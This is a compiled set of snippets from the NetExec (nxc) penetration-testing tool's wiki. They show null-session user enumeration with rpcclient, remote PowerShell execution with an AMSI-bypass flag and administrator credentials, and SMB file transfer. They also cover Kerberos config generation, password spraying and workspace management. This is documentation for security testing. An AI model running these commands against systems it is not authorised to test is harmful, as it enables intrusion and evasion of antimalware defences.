shell, showing example output. ```Shell rpcclient -N -U "" -L \\10.10.10.161 rpcclient $> enumdomusers user:[bonclay] rid:[0x46e] user:[zoro] rid:[0x46f] ``` -------------------------------- ### Bypass AMSI for PowerShell Execution with nxc Source: https://www.netexec.wiki/smb-protocol/command-execution/execute-remote-command This example demonstrates how to bypass AMSI (Antimalware Scan Interface) when executing PowerShell commands using NetExec (nxc). It involves using the `--amsi-bypass` flag and specifying a path to a payload designed for the bypass. ```Shell nxc smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable' --amsi-bypass /path/payload ``` -------------------------------- ### NetExec Command-Line Flags for Configuration File Generation Source: https://www.netexec.wiki/news/v1.4 This section details NetExec's command-line flags for automatically generating system configuration files. It covers the `--generate-hosts-file` flag for creating `/etc/hosts` entries from SMB enumeration and the `--generate-krb5-file` flag for generating a valid `krb5.conf` file to facilitate Kerberos authentication. ```APIDOC --generate-hosts-file - Description: Automatically generates an /etc/hosts file based on machines enumerated over SMB. - Parameters: - : The path and name of the file to generate. - Purpose: Simplifies adding/removing entries in /etc/hosts for CTFs and real-world scenarios. --generate-krb5-file - Description: Generates a valid krb5.conf file. - Parameters: - : The path and name of the krb5.conf file to generate. - Purpose: Enables Kerberos authentication with other tools, similar to the hosts file generation. ``` -------------------------------- ### Retrieve File from Remote Target using NetExec SMB Source: https://www.netexec.wiki/smb-protocol/get-and-put-files This command retrieves a file from a remote Windows target via SMB using NetExec. It requires specifying the target IP address, username, password, the remote file path, and the local destination path. ```Shell nxc smb 172.16.251.152 -u user -p pass --get-file \\Windows\\Temp\\whoami.txt /tmp/whoami.txt ``` -------------------------------- ### Generate krb5.conf file and set environment variable with NetExec Source: https://www.netexec.wiki/smb-protocol/generate-krb5 This snippet demonstrates how to use the `netexec` tool to generate a `krb5.conf` file for SMB authentication. It also shows how to export the `KRB5_CONFIG` environment variable, pointing to the newly created configuration file, which is essential for Kerberos-based operations. ```Shell netexec smb ip -u user -p password --generate-krb5-file /path export KRB5_CONFIG=/path ``` -------------------------------- ### Execute PowerShell Commands on Windows with nxc Source: https://www.netexec.wiki/smb-protocol/command-execution/execute-remote-command This example illustrates how to execute PowerShell commands on a target Windows system using NetExec (nxc) via the SMB protocol. It requires administrator credentials and employs the `-X` flag for direct PowerShell command execution. ```Shell nxc smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable' ``` -------------------------------- ### Send File to Remote Target using NetExec SMB Source: https://www.netexec.wiki/smb-protocol/get-and-put-files This command sends a local file to a remote Windows target via SMB using NetExec. It requires specifying the target IP address, username, password, the local file path, and the remote destination path. ```Shell nxc smb 172.16.251.152 -u user -p pass --put-file /tmp/whoami.txt \\Windows\\Temp\\whoami.txt ``` -------------------------------- ### WMI Protocol Core Actions Source: https://www.netexec.wiki/smb-protocol/enumeration/enumerate-disks Fundamental WMI operations including password spraying, authentication, and command execution. ```APIDOC Password Spraying Authentication Command Execution ``` -------------------------------- ### Creating a New Workspace in nxcdb Source: https://www.netexec.wiki/getting-started/database-general-usage Illustrates the command to create a new workspace named 'test' within the `nxcdb` environment. Workspaces help separate different engagement data, providing isolated storage contexts. ```shell nxcdb (default) > workspace create test [*] Creating workspace 'test' <-- CUT --> nxcdb (test) > ``` -------------------------------- ### Accessing a Protocol's Database in nxcdb Source: https://www.netexec.wiki/getting-started/database-general-usage Illustrates how to switch to a specific protocol's database, such as SMB, within `nxcdb`. This allows interaction with data relevant to that particular protocol, providing a focused view. ```shell nxcdb (test) > proto smb nxcdb (test)(smb) > ``` -------------------------------- ### Listing All Workspaces in nxcdb Source: https://www.netexec.wiki/getting-started/database-general-usage Shows the command to enumerate and display all available workspaces configured in `nxcdb`, indicating the currently active one. This helps users manage and navigate their different engagement contexts. ```shell nxcdb (test) > workspace list [*] Enumerating Workspaces default ==> test ```